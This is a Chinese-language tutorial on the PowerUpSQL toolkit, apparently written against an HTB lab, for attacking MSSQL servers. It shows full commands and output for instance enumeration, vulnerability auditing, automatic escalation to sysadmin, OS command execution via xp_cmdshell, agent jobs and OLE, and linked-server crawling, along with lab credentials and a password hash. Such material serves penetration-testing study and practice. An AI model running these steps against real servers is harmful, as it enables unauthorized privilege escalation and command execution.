PowerUpSQL
1. PowerUpSQL
PowerUpSQL是一款Powershell工具包,与impacket-mssqlclient类似,其用于在Windows上快速执行T-SQL查询
1.1. 使用
你可以在这里获取到此工具包的速查表
https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
1.1.1. 连接到 Mssql Server实例
PS C:\Users\student\Desktop\PowerUpSQL> Import-Module .\PowerUpSQL.psm1
PS C:\Users\student\Desktop\PowerUpSQL> Get-SQLQuery -Verbose -Instance "127.0.0.1,1433" -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Query "SELECT SYSTEM_USER"
VERBOSE: 127.0.0.1,1433 : Connection Success.
Column1
-------
ws_dev
1.1.2. 枚举
Get-SQLInstanceLocal, Get-SQLInstanceBroadcast and Get-SQLInstanceDomain函数
分别用于
- 本地探测 查找当前机器上的 SQL Server 实例
- 网络广播探测 向本地网络(子网)发送广播包,寻找通过网络暴露出来的 SQL Server 实例
- 域环境探测 查询活动目录过扫描 SPN 获取整个域内注册的所有 SQL Server 实例列表
PS C:\Users\student\Desktop\PowerUpSQL> Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 2 instances were found.
ComputerName : SQL02.htb.local
Instance : SQL02.htb.local,1433
DomainAccountSid : 1500000521000186208125681511122181312461583125284400
DomainAccount : SQL02$
DomainAccountCn : SQL02
Service : MSSQLSvc
Spn : MSSQLSvc/SQL02.htb.local:1433
LastLogon : 3/16/2026 2:33 AM
Description :
ComputerName : SQL02.htb.local
Instance : SQL02.htb.local
DomainAccountSid : 1500000521000186208125681511122181312461583125284400
DomainAccount : SQL02$
DomainAccountCn : SQL02
Service : MSSQLSvc
Spn : MSSQLSvc/SQL02.htb.local
LastLogon : 3/16/2026 2:33 AM
Description :
Get-SQLServerInfo and Invoke-SQLDumpInfo可以用于进一步枚举特定的实例
PS C:\Users\student\Desktop\PowerUpSQL> Get-SQLServerInfo -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"
ComputerName : SQL01
Instance : SQL01
DomainName : HTB
ServiceProcessID : 4628
ServiceName : MSSQLSERVER
ServiceAccount : HTB\svc_sql
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 16.0.1000.6
SQLServerMajorVersion : 2022
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : ws_dev
IsSysadmin : No
ActiveSessions : 1
Invoke-SQLDumpInfo 会创建大量包含 CSV 、 databases 、 users 及更多信息的 privileges 文件
PS C:\Users\student\Desktop\PowerUpSQL> Invoke-SQLDumpInfo -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"
PS C:\Users\student\Desktop\PowerUpSQL> type SQL01_Databases.csv
"ComputerName","Instance","DatabaseId","DatabaseName","DatabaseOwner","OwnerIsSysadmin","is_trustworthy_on","is_db_chaining_on","is_broker_enabled","is_encrypted","is_read_only","create_date","recovery_model_desc","FileName","DbSizeMb","has_dbaccess"
"SQL01","SQL01","5","webshop","sa","1","True","False","False","False","False","5/13/2024 4:16:03 PM","FULL","C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\webshop.mdf","","1"
"SQL01","SQL01","6","privesc","sa","1","False","False","False","False","False","5/19/2024 3:42:55 AM","FULL","C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\privesc.mdf","","0"
PS C:\Users\student\Desktop\PowerUpSQL>
Invoke-SQLAudit用于快速枚举可能的漏洞
PS C:\Users\student\Desktop\PowerUpSQL> Invoke-SQLAudit -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"
VERBOSE: SQL01 : No named instance found.
VERBOSE: SQL01 : Connection Success.
VERBOSE: SQL01 : Checking for autoexec stored procedures...
ComputerName : SQL01
Instance : SQL01
Vulnerability : Excessive Privilege - Impersonate Login
Description : The current SQL Server login can impersonate other logins. This may allow an
authenticated login to gain additional privileges.
Remediation : Consider using an alterative to impersonation such as signed stored procedures.
Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to
[user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa
to [user]
Severity : High
IsVulnerable : Yes
IsExploitable : Yes
Exploited : No
ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQL01 -Exploit
Details : ws_dev can impersonate the sa SYSADMIN login. This test was ran with the ws_dev
login.
Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx
Author : Scott Sutherland (@_nullbind), NetSPI 2016
ComputerName : SQL01
Instance : SQL01
Vulnerability : Excessive Privilege - Impersonate Login
Description : The current SQL Server login can impersonate other logins. This may allow an
authenticated login to gain additional privileges.
Remediation : Consider using an alterative to impersonation such as signed stored procedures.
Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to
[user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa
to [user]
Severity : High
IsVulnerable : Yes
IsExploitable : No
Exploited : No
ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQL01 -Exploit
Details : ws_dev can impersonate the ws_user login (not a sysadmin). This test was ran with
the ws_dev login.
Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx
Author : Scott Sutherland (@_nullbind), NetSPI 2016
ComputerName : SQL01
Instance : SQL01
Vulnerability : Excessive Privilege - Trustworthy Database
Description : One or more database is configured as trustworthy. The TRUSTWORTHY database
property is used to indicate whether the instance of SQL Server trusts the
database and the contents within it. Including potentially malicious assemblies
with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious
modules that are defined to execute as high privileged users. Combined with other
weak configurations it can lead to user impersonation and arbitrary code exection
on the server.
Remediation : Configured the affected database so the 'is_trustworthy_on' flag is set to
'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used
to set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET
TRUSTWORTHY OFF' can be use to unset it.
Severity : Low
IsVulnerable : Yes
IsExploitable : No
Exploited : No
ExploitCmd : There is not exploit available at this time.
Details : The database webshop was found configured as trustworthy.
Reference : https://msdn.microsoft.com/en-us/library/ms187861.aspx
Author : Scott Sutherland (@_nullbind), NetSPI 2016
ComputerName : SQL01
Instance : SQL01
Vulnerability : Excessive Privilege - Execute xp_dirtree
Description : xp_dirtree is a native extended stored procedure that can be executed by members
of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to
force the SQL Server service account to authenticate to a remote attacker. The
service account password hash can then be captured + cracked or relayed to gain
unauthorized access to systems. This also means xp_dirtree can be used to
escalate a lower privileged user to sysadmin when a machine or managed account
isnt being used. Thats because the SQL Server service account is a member of the
sysadmin role in SQL Server 2000-2014, by default.
Remediation : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative
logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public
Severity : Medium
IsVulnerable : Yes
IsExploitable : Yes
Exploited : No
ExploitCmd : Crack the password hash offline or relay it to another system.
Details : The public principal has EXECUTE privileges on the xp_dirtree procedure in the
master database.
Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploi
t/
Author : Scott Sutherland (@_nullbind), NetSPI 2016
ComputerName : SQL01
Instance : SQL01
Vulnerability : Excessive Privilege - Execute xp_fileexist
Description : xp_fileexist is a native extended stored procedure that can be executed by
members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be
used to force the SQL Server service account to authenticate to a remote
attacker. The service account password hash can then be captured + cracked or
relayed to gain unauthorized access to systems. This also means xp_dirtree can be
used to escalate a lower privileged user to sysadmin when a machine or managed
account isnt being used. Thats because the SQL Server service account is a
member of the sysadmin role in SQL Server 2000-2014, by default.
Remediation : Remove EXECUTE privileges on the xp_fileexist procedure for non administrative
logins and roles. Example command: REVOKE EXECUTE ON xp_fileexist to Public
Severity : Medium
IsVulnerable : Yes
IsExploitable : Yes
Exploited : No
ExploitCmd : Crack the password hash offline or relay it to another system.
Details : The public principal has EXECUTE privileges on xp_fileexist procedure in the
master database.
Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploi
t/
Author : Scott Sutherland (@_nullbind), NetSPI 2016
ComputerName : SQL01
Instance : SQL01
Vulnerability : Potentially Sensitive Columns Found
Description : Columns were found in non default databases that may contain sensitive
information.
Remediation : Ensure that all passwords and senstive data are masked, hashed, or encrypted.
Severity : Informational
IsVulnerable : Yes
IsExploitable : Yes
Exploited : Yes
ExploitCmd : Invoke-SQLAuditSampleDataByColumn -Instance SQL01 -Exploit
Details : Data sample from [webshop].[dbo].[Users].[Password] :
"c8c4769906056ccc4950e5827b79cd12".
Reference : https://msdn.microsoft.com/en-us/library/ms188348.aspx
Author : Scott Sutherland (@_nullbind), NetSPI 2016
1.1.3. 权限提升
Invoke-SQLEscalatePriv可以自动枚举漏洞(后台使用 Invoke-SQLAudit ),并提权到sysadmin
PS C:\Users\student\Desktop> Invoke-SQLEscalatePriv -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Verbose
VERBOSE: SQL01 : Checking if you're already a sysadmin...
VERBOSE: SQL01 : You're not a sysadmin, attempting to change that...
VERBOSE: LOADING VULNERABILITY CHECKS.
VERBOSE: RUNNING VULNERABILITY CHECKS.
<SNIP>
VERBOSE: SQL01 : Success! You are now a sysadmin!
这会永久的将sysadmin角色授予我login的用户
1.1.4. 命令执行
- Invoke-SQLOSCmd 启用并通过
xp_cmdshell执行命令 - Invoke-SQLOSCmdAgentJob 通过
MSSQL Server Agent Jobs执行命令 - Invoke-SQLOSCmdOle 通过
OLE Automation Stored Procedures执行命令
Invoke-SQLOSCmdAgentJob 不返回命令输出,并且需要额外的 SubSystem 参数来指定应使用哪个 subsytem 来创建其 job step ( PowerShell 、 CmdExec 、 JScript 或 VBScript )
PS C:\Users\student\Desktop> Invoke-SQLOSCmd -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Command "whoami"
ComputerName Instance CommandResults
------------ -------- --------------
SQL01 SQL01 htb\svc_sql
PS C:\Users\student\Desktop> Invoke-SQLOSCmdAgentJob -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -SubSystem "CmdExec" -Command "whoami"
ComputerName Instance Results
------------ -------- -------
SQL01 SQL01 The Job succesfully started and was removed.
PS C:\Users\student\Desktop> Invoke-SQLOSCmdOle -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Command "whoami"
ComputerName Instance CommandResults
------------ -------- --------------
SQL01 SQL01 htb\svc_sql
1.1.5. 横向移动
Get-SqlServerLinkCrawl可以用于枚举链接服务器
PS C:\Users\student\Desktop> Get-SqlServerLinkCrawl -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"
Version : SQL Server 2022
Instance : SQL01
CustomQuery :
Sysadmin : 1
Path : {SQL01}
User : ws_dev
Links : {SQL02}
Version : SQL Server 2022Instance : SQL02CustomQuery :Sysadmin : 1Path : {SQL01, SQL02}User : saLinks : {SQL01}
Version : SQL Server 2022
Instance : SQL01
CustomQuery :
Sysadmin : 0
Path : {SQL01, SQL02, SQL01}
User : ws_user
Links : {SQL02}
第二个表示,我们可以通过SQL01以SA身份链接到SQL02
可以通过在 OPENQUERY 函数中添加 AT 参数来对链接服务器执行 SELECT 查询,结果会输出为XML 格式,需要额外处理才能实际读取内容
PS C:\Users\student\Desktop> $Out = Get-SQLServerLinkCrawl -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Query "SELECT SYSTEM_USER";
PS C:\Users\student\Desktop> $Out
Version : SQL Server 2022
Instance : SQL01
CustomQuery : System.Data.DataRow
Sysadmin : 1
Path : {SQL01}
User : ws_dev
Links : {SQL02}
Version : SQL Server 2022
Instance : SQL02
CustomQuery : System.Data.DataRow
Sysadmin : 1
Path : {SQL01, SQL02}
User : sa
Links : {SQL01}
Version : SQL Server 2022
Instance : SQL01
CustomQuery : System.Data.DataRow
Sysadmin : 0
Path : {SQL01, SQL02, SQL01}
User : ws_user
Links : {SQL02}
PS C:\Users\student\Desktop> foreach ($Server in $out) {$CustomQuery = $Server.CustomQuery; foreach ($Row in $CustomQuery) {Write-Host($Row.Item(0));}};
ws_dev
sa
ws_user